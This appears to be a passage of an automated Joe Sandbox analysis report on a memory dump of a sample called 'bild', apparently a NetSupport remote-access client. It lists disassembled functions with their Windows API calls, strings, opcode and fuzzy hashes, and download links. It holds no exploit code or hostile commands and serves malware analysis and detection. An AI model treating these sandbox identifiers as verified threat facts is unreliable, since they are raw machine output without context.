                                                                                    • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenwvsprintf
                                                                                    • String ID: Error %d Opening regkey %s
                                                                                    • API String ID: 1772833024-3994271378
                                                                                    • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                    • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                    • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                    • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                    Function 110ED160 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                      • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                    Strings
                                                                                    • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Closewvsprintf
                                                                                    • String ID: Error %d closing regkey %x
                                                                                    • API String ID: 843752472-892920262
                                                                                    • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                    • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                    • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                    • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                    Function 111463D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,023CB898,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                      • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HandleLibraryLoadModule
                                                                                    • String ID: NSMTRACE
                                                                                    • API String ID: 4133054770-4175627554
                                                                                    • Opcode ID: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                    • Instruction ID: cf49eb18fee32400038a48a9d82a087192b912de878353ac6c822cd252c7dc11
                                                                                    • Opcode Fuzzy Hash: e82bf018f903e4ea25f627aae3f92f4affe26e4f9d0fd19bd58a96316eee6a50
                                                                                    • Instruction Fuzzy Hash: 50D05EB520033BCFDB489F7995B4269F7EAAB4CA1D3540075E469C2A07EBB0D848C714
                                                                                    Function 11025CD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: psapi.dll
                                                                                    • API String ID: 1029625771-80456845
                                                                                    • Opcode ID: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                    • Instruction ID: d2f0b82a95d6fc878682dccaf19b7a180456f678ee46f3fe844c8dbdc6f5fb44
                                                                                    • Opcode Fuzzy Hash: 84de3e9765d3447a8351f1b6b6d8569fbb25dc0ee6f9e080ef7528236ef5d75a
                                                                                    • Instruction Fuzzy Hash: C9E001B1A11B248FC3B4CF3AA844642FAF0BB18A103118A3ED4AEC3A00E330A5448F80
                                                                                    Function 11014F80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: nslsp.dll
                                                                                    • API String ID: 1029625771-3933918195
                                                                                    • Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                    • Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
                                                                                    • Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                    • Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
                                                                                    Function 11074DC0 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 11074E1F
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1654520187-0
                                                                                    • Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                    • Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
                                                                                    • Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                    • Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
                                                                                    Function 1105FCF0 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • std::exception::exception.LIBCMT ref: 1105FD93
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1105FDA8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1338273076-0
                                                                                    • Opcode ID: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                    • Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
                                                                                    • Opcode Fuzzy Hash: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                    • Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1
                                                                                    Function 1105EC90 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _malloc_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1183979061-0
                                                                                    • Opcode ID: 457b307eca14e29342672ca62ef5147d46d8b4d4f126d6aa85e0778cfe473ab4
                                                                                    • Instruction ID: db33143030e4a9298ca15ccbefe9b49d771c33472961b073c023ff9ae0ea679a
                                                                                    • Opcode Fuzzy Hash: 457b307eca14e29342672ca62ef5147d46d8b4d4f126d6aa85e0778cfe473ab4
                                                                                    • Instruction Fuzzy Hash: 98F0F47AE002666F9741CF2C9844896FBDCDF8A158314C4A2E999CB301D671EC0687E0
                                                                                    Function 110883D0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 110883EF
                                                                                    • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInitializeSection_memset
                                                                                    • String ID:
                                                                                    • API String ID: 453477542-0
                                                                                    • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                    • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                    • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                    • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                    Function 11144440 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                    • ExtractIconExA.SHELL32(?,00000000,0004044D,00040455,00000001), ref: 11144498
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExtractFileIconModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 3911389742-0
                                                                                    • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                    • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                    • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                    • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                    Function 11163DB7 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                    • __lock_file.LIBCMT ref: 11163DFE
                                                                                      • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                    • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2800547568-0
                                                                                    • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                    • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                    • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                    • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                    Function 11144EA0 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                      • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
